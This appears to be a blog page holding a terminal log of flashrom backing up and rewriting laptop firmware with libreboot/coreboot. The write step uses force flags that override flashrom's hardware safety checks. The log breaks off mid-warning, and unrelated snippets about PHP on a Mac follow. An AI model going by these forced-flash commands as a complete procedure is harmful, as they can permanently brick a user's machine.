You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Reading flash... done.
flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r   7.37s user 0.02s system 99% cpu 7.393 total
root@grml ~ # 

compare

root@grml ~ # sha1sum w500libreboot*
67438673dd5411bae91ced0e4fdbff06d328ba75  w500libreboot2.rom
67438673dd5411bae91ced0e4fdbff06d328ba75  w500libreboot.rom
root@grml ~ # 

write

139 root@grml ~ # flashrom -c "MX25L6405D" -p internal:boardmismatch=force,laptop=force_I_want_a_brick -w coreboot.rom
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we

** Have fun **

Links

October 16, 2019

I ran into this error when doing a pecl install imagick on a Mac.
I was setting up a new Mac and ran into this problem again, where a default PHP installation with brew is missing a few important extensions.